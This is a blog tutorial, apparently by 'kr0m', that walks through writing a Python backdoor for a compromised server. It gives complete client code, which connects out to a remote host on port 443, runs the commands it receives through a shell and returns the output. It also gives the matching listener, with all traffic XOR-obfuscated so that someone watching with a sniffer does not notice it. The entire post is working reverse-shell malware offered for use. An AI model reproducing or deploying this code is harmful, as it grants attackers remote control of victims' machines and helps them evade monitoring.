This page looks best with JavaScript enabled

Python backdoor with reverse connection and basic encryption

 ·  🎃 kr0m

In this small tutorial, we will see how to program a very basic backdoor with support for reverse connections and obfuscation of network traffic. This way, if someone is looking at the traffic with some kind of sniffer, we will go unnoticed. The idea is to simulate a remote shell on the compromised server.

The encryption used is very basic and more than encryption, it could be said that it is a way to obfuscate the commands to be executed. This way, if someone is looking at the network traffic with some kind of sniffer, it won’t attract much attention.

It consists of doing an XOR of each of the characters of the command with the character A, which in the ASCII table is (CHAR/Dec/Hex/Bin): A/65/0x41/%01000001

Therefore, if we write the char A: Therefore, if we write the char B: Therefore, if we write the char C:
%01000001 %01000001 %01000001
%01000001 %01000010 %01000011
%00000000 -> 0 -> ^@ %00000011 -> 3 -> ^C %00000010 -> 2 -> ^B

Having written ABC in the network traffic, only ^@^C^B would be seen.

Once the obfuscation has been explained, let’s move on to the client code:

#!/usr/bin/python
import socket,subprocess,sys
 
RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
 
while True:
     data = s.recv(1024)
 
     # Decodificamos el comando a ejecutar aplicando el XOR
     de_data = bytearray(data)
     for i in range(len(de_data)):
       de_data[i] ^=0x41
 
     # Ejecutamos el comando via subprocess
     comm = subprocess.Popen(str(de_data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
     STDOUT, STDERR = comm.communicate()
 
     # Codificamos la salida del comando y se la enviamos al host remoto
     en_STDOUT = bytearray(STDOUT)
     for i in range(len(en_STDOUT)):
       en_STDOUT[i] ^=0x41
     s.send(en_STDOUT)
s.close()

Now, the server code:

#!/usr/bin/python
import socket
 
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2)
print "Listening on port 443... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip
 
while True:
    # Codificamos el comando a ejecutar y lo enviamos
    command = raw_input('~$ ')
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^=0x41
    client.send(encode)

    # Decodificamos la salida del comando remoto
    en_data=client.recv(2048)
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^=0x41
    print decode
 
client.close()
s.close()
If you liked the article, you can treat me to a RedBull here